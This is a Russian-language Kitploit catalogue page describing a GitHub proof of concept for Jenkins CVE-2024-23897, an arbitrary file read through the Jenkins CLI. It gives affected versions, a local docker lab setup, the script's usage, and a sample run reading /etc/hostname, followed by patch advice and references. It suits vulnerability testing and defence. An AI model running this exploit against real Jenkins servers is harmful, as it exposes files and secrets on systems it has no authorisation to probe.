Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Jenkins-CVE-2024-23897 — PoC for Jenkins CVE-2024-23897 | Kitploit
Инструменты/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

PoC for Jenkins CVE-2024-23897

Репозиторий
112 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Jenkins CVE-2024-23897 PoC

Доказательство концепции (PoC) для CVE-2024-23897 — уязвимость произвольного чтения файлов во встроенном интерфейсе командной строки (CLI) Jenkins. Она позволяет неаутентифицированным злоумышленникам с разрешением Overall/Read читать произвольные файлы в файловой системе контроллера Jenkins.

Затронутые версии

  • Jenkins версии <= 2.441
  • Jenkins LTS версии <= 2.426.2

Настройка уязвимого экземпляра

Запустите локальный уязвимый экземпляр с помощью docker compose:

root@kitploit:~
cd docker
docker compose up -d

Экземпляр будет доступен по адресу http://localhost:1234

Эксплуатация

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Пример

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

Скрипт может испытывать проблемы при чтении больших файлов из-за конкурентности и таймаутов соединения. Для получения более подробной технической информации и пошагового руководства по уязвимости ознакомьтесь с моей статьей в блоге на эту тему.

Исправление

  • Обновитесь до Jenkins 2.442 или LTS 2.426.3
  • Примените временные обходные меры, как описано в совете по безопасности Jenkins.

Связанные ссылки

  • Sonar Source | Чрезмерное расширение: выявление критических уязвимостей безопасности в Jenkins
  • Совет по безопасности Jenkins — 2024-01-24
  • Qualys ThreatPROTECT | Уязвимость удаленного выполнения кода в ядре Jenkins (CVE-2024-23897)
  • CVE-2024-23897: Оценка влияния уязвимости утечки произвольных файлов Jenkins – Horizon3.ai
Скачать инструмент